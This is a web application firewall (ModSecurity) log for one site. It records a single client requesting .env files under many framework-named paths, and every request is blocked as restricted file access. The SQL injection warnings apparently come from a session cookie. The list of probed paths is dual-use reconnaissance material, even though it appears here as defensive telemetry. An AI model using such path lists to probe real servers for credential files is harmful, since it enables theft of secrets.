[Mon May 11 16:33:42.564076 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/node/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXuwAAAM0"]
[Mon May 11 16:33:42.564325 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/node/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXuwAAAM0"]
[Mon May 11 16:33:42.727890 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/express/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXvAAAAM0"]
[Mon May 11 16:33:42.728276 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/express/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXvAAAAM0"]
[Mon May 11 16:33:42.728465 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/express/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXvAAAAM0"]
[Mon May 11 16:33:42.728712 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/express/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXvAAAAM0"]
[Mon May 11 16:33:42.892810 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/next/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXvQAAAM0"]
[Mon May 11 16:33:42.893195 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/next/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXvQAAAM0"]
[Mon May 11 16:33:42.893378 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/next/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXvQAAAM0"]
[Mon May 11 16:33:42.893629 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/next/.env"] [unique_id "agHoxlV4kyjgo4bQBUhXvQAAAM0"]
[Mon May 11 16:33:43.056714 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/nuxt/.env"] [unique_id "agHox1V4kyjgo4bQBUhXvgAAAM0"]
[Mon May 11 16:33:43.057093 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/nuxt/.env"] [unique_id "agHox1V4kyjgo4bQBUhXvgAAAM0"]
[Mon May 11 16:33:43.057288 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/nuxt/.env"] [unique_id "agHox1V4kyjgo4bQBUhXvgAAAM0"]
[Mon May 11 16:33:43.057544 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/nuxt/.env"] [unique_id "agHox1V4kyjgo4bQBUhXvgAAAM0"]
[Mon May 11 16:33:43.221223 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/nest/.env"] [unique_id "agHox1V4kyjgo4bQBUhXvwAAAM0"]
[Mon May 11 16:33:43.221601 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/nest/.env"] [unique_id "agHox1V4kyjgo4bQBUhXvwAAAM0"]
[Mon May 11 16:33:43.221781 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/nest/.env"] [unique_id "agHox1V4kyjgo4bQBUhXvwAAAM0"]
[Mon May 11 16:33:43.222029 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/nest/.env"] [unique_id "agHox1V4kyjgo4bQBUhXvwAAAM0"]
[Mon May 11 16:33:43.385506 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/react/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwAAAAM0"]
[Mon May 11 16:33:43.385877 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/react/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwAAAAM0"]
[Mon May 11 16:33:43.386054 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/react/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwAAAAM0"]
[Mon May 11 16:33:43.386317 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/react/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwAAAAM0"]
[Mon May 11 16:33:43.549116 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/vue/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwQAAAM0"]
[Mon May 11 16:33:43.549511 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/vue/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwQAAAM0"]
[Mon May 11 16:33:43.549701 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/vue/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwQAAAM0"]
[Mon May 11 16:33:43.549958 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/vue/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwQAAAM0"]
[Mon May 11 16:33:43.712632 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /angular/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/angular/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwgAAAM0"]
[Mon May 11 16:33:43.713029 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/angular/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwgAAAM0"]
[Mon May 11 16:33:43.713243 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/angular/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwgAAAM0"]
[Mon May 11 16:33:43.713496 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/angular/.env"] [unique_id "agHox1V4kyjgo4bQBUhXwgAAAM0"]
[Mon May 11 16:33:43.876376 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /svelte/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/svelte/.env"] [unique_id "agHox1V4kyjgo4bQBUhXxAAAAM0"]
[Mon May 11 16:33:43.876734 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/svelte/.env"] [unique_id "agHox1V4kyjgo4bQBUhXxAAAAM0"]
[Mon May 11 16:33:43.876895 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/svelte/.env"] [unique_id "agHox1V4kyjgo4bQBUhXxAAAAM0"]
[Mon May 11 16:33:43.877189 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/svelte/.env"] [unique_id "agHox1V4kyjgo4bQBUhXxAAAAM0"]
[Mon May 11 16:33:44.039768 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/vite/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxQAAAM0"]
[Mon May 11 16:33:44.040178 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/vite/.env"] [unique_id "agHoyFV4kyjgo4bQBUhXxQAAAM0"]
